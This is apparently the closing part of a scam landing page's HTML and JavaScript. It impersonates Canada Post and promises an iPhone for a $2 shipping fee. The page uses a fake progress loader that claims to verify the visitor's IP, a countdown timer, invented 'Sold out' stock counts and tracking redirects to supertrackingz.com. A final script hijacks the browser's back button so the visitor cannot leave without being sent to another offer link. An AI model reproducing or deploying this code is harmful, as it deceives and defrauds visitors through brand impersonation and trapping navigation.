                                                <span class="qu-checkpoint-desc txt" id="txt43"> You've been qualified for 1 FREE Gift </span>
                                            </td>
                                        </tr>
                                    </tbody>
                                </table>
                            </div>
                        </div>
                    </div>
				<div id="qu-prize" class="col-xs-12 col-md-8 col-md-offset-2" style="display: none;">
					<div class="row">
						<div class="qu-group-header col-xs-12">
							Claim your gift now:
						</div>
					</div>
					<div class="row qu-prize-row">
						<div class="col-xs-4 text-xs-right qu-item">
							<img class="prize-image clickable" src="2d15f6db27b8231ce4ba71c23c983750.png">
						</div>
						<div class="col-xs-7 text-xs-left qu-prize-description">
							<p class="qu-prize-name clickable">iPhone 11</p>
							<p><strong>Your price:</strong><span class="qu-yourprice-value"> <span class="tp"><b class="blink tp">$2!</b></span> (Shipping costs)</span></p>
							<p id="remaining"><strong>Available:</strong> <span id="remainingCount">2</span></p>
							<p><a onclick="showBox(1)" class="qu-take-it">Claim</a></p>
						</div>
					</div>
					<div class="row qu-prize-row qu-opacied">
						<div class="col-xs-4 text-xs-right qu-item">
							<img class="prize-image" src="425fdd99a06e0cd995dffa1b029714cc.jpg">
						</div>
						<div class="col-xs-7 text-xs-left qu-prize-description">
							<p class="qu-prize-name">Samsung Galaxy S10</p>
							<p><strong>Your price:</strong> $2! (Shipping costs)</p>
							<p><strong>Available:</strong> 0</p>
							<p class="qu-btn-dis">Sold out</p>
						</div>
					</div>
					<div class="row qu-prize-row qu-opacied">
						<div class="col-xs-4 text-xs-right qu-item">
							<img class="prize-image" src="a302d31348b8b4cf42843f6224326072.jpg">
						</div>
						<div class="col-xs-7 text-xs-left qu-prize-description">
							<p class="qu-prize-name">iPad Pro</p>
							<p><strong>Your price:</strong> $2! (Shipping costs)</p>
							<p><strong>Available:</strong> 0</p>
							<p class="qu-btn-dis">Sold out</p>
						</div>
					</div>
				</div>
                </div>
            </div>
        </div>

    </div>
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-md-8 col-md-offset-2 copyright text-xs-center">
                © <span id="isp8">Canada Post</span> <script>document.write(new Date().getFullYear())</script>2019

                <div class="copyright-image img-responsive">
                    <img src="rta.gif">
                </div>
                <div class="conditions txt" id="txt44"><a> conditions </a></div>

            </div>
        </div>
    </div>
    <div style="display: none;">
        <div class="jingle-header-crutch">
            <table>
                <tbody>
                    <tr>
                        <td class="slogan"><span class="marked txt" id="txt45"><span id="isp9">Canada Post</span> Customer Reward Program</span>
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
    </div>
    <script>
        window.onload = function() {
            var myModal = document.getElementById("myModal")
            document.body.classList.add("modal-open");
            myModal.style.display = "block";
            myModal.classList.add("in");
            myModal.style.backgroundColor = "rgba(44,44,45,0.7)";
            document.querySelector(".modal-dialog").classList.add("slideIn");
            myModal.onclick = function() {
                document.querySelector(".modal-dialog").classList.remove("slideIn");
                document.querySelector(".modal-dialog").classList.add("slideFadeOut");
                setTimeout(function() {
                    myModal.style.display = "none";
                    document.body.classList.remove("modal-open");
                }, 600)


            }
        }

        function toNext(ele) {
            var ancestor = ele.parentElement.parentElement;
            var next = ancestor.nextElementSibling;
            ancestor.classList.add("fadeOut");
            setTimeout(function() {
                ancestor.style.display = "none";
            }, 490)
            setTimeout(function() {
                next.classList.add("fadeIn");
                next.style.display = "block"
            }, 500)
        }

        var values = ["Verifying answers...", "Verifying IP-address...", "Selecting Gift...", "Congratulations!"]
        function drawloader() {
            var bar = document.getElementById("qu-progress-bar")
            bar.classList.add("draw");
            setTimeout(function() {
                bar.style.width = "100%"
            }, 1500)
            var results = [document.getElementById("qu-checkpoint-10"), document.getElementById("qu-checkpoint-20"), document.getElementById("qu-checkpoint-30")]
            var state = document.getElementById("qu-progress-state");
            var count = 0
            var changeState = setInterval(function() {
                state.innerHTML = values[count];
                if (count - 1 >= 0) {
                    results[count - 1].style.opacity = 1
                }
                count++;
                if (count == values.length) {
                    clearInterval(changeState)
                }
            }, 600)
            var percent = document.getElementById('qu-progress-percent');
            var cent = 0;
            var addNumber = setInterval(function() {
                percent.innerHTML = cent + "%";
                cent++;
                if (cent > 100) {
                    clearInterval(addNumber);
                    document.getElementById("qu-prize").style.display = "block"
                }
            }, 25)

        }

        var answers = document.querySelectorAll(".qu");
        for (var i = 0; i < answers.length; i++) {
            if (i < answers.length - 2) {
                answers[i].onclick = function() {
                    toNext(this)
                }
            } else {
                answers[i].onclick = function() {
                    toNext(this);
                    setTimeout(function() {
                        drawloader()
                    }, 1000)
                }
            }

        }

        function showBox(offerNr) {
            var tingle = document.getElementById('tingle1');
            tingle.style.display = "";
            tingle.classList.add("tingle-modal--visible");
            document.body.classList.add("tingle-enabled");
            document.querySelector(".tingle-modal-box").style.margin = "100px auto";
            document.querySelector(".tingle-modal-box").classList.add("scaleBox");
            document.querySelector("#clickurl").href = 'https://supertrackingz.com/click.php?lp=1&to_offer=' + offerNr;
        }

        function hideBox() {
            var tingle = document.getElementById('tingle1');
            tingle.style.display = "none";
            tingle.classList.remove("tingle-modal--visible");
            document.body.classList.remove("tingle-enabled");
        }

        function __cta() {
            hideBox();
        }

        setInterval('countdown()', 1000);

        function countdown() {
            var mins = parseInt(document.getElementById("timer-mins").innerHTML);
            var secs = parseInt(document.getElementById("timer-secs").innerHTML);
            if (mins != 0 && secs == 0) {
                nmins = mins - 1;
                nsecs = 59;
            } else if (mins != 0 || secs != 0) {
                nmins = mins;
                nsecs = secs - 1;
            } else if (mins == 0 && secs == 0) {
                nmins = mins;
                nsecs = secs;
            }
            document.getElementById("timer-mins").innerHTML = nmins;
            document.getElementById("timer-secs").innerHTML = nsecs;
            if (nsecs < 10) nsecs = "0" + nsecs;
        }
        
        function addID() {
    var texts = document.querySelectorAll(".txt");
    
    var nodes = [];
    for (var i = 0; i < texts.length; i++) {
        texts[i].id = "txt" + (i + 1);
        nodes.push(texts[i]);
    }
}
addID();

function getText() {
    var langs = {};
    for (var i = 1; i < 1000; i++) {
        var key = "txt" + i;
        if (document.getElementById(key)) {
            var value = document.getElementById(key).innerHTML.trim();
            var splitValue = value.split(/[\n, ,\t]/);
            splitValue = splitValue.filter(function (ele) {
                return ele != ""
            });
            splitValue = splitValue.map(function (ele) {
                return ele.trim()
            });
            value = splitValue.join(" ");
            langs[key] = value;
        } else {
            break
        }
    }
    return langs;
}

getText();
    </script>
<script type="text/javascript">
    ! function () {
        var t;
        try {
            const URL = window.location.href.split(/[#]/)[0];
            for (t = 0; 10 > t; ++t) history.pushState({}, "", URL+'#')
            onpopstate = function(event){
                event.state && location.replace('https://supertrackingz.com/click.php?key=guxytwlm8pqsf6djbwvt&vertical=carrier');
            }
        } catch (o) { console.log( o ); }
    }();
</script>

</body></html>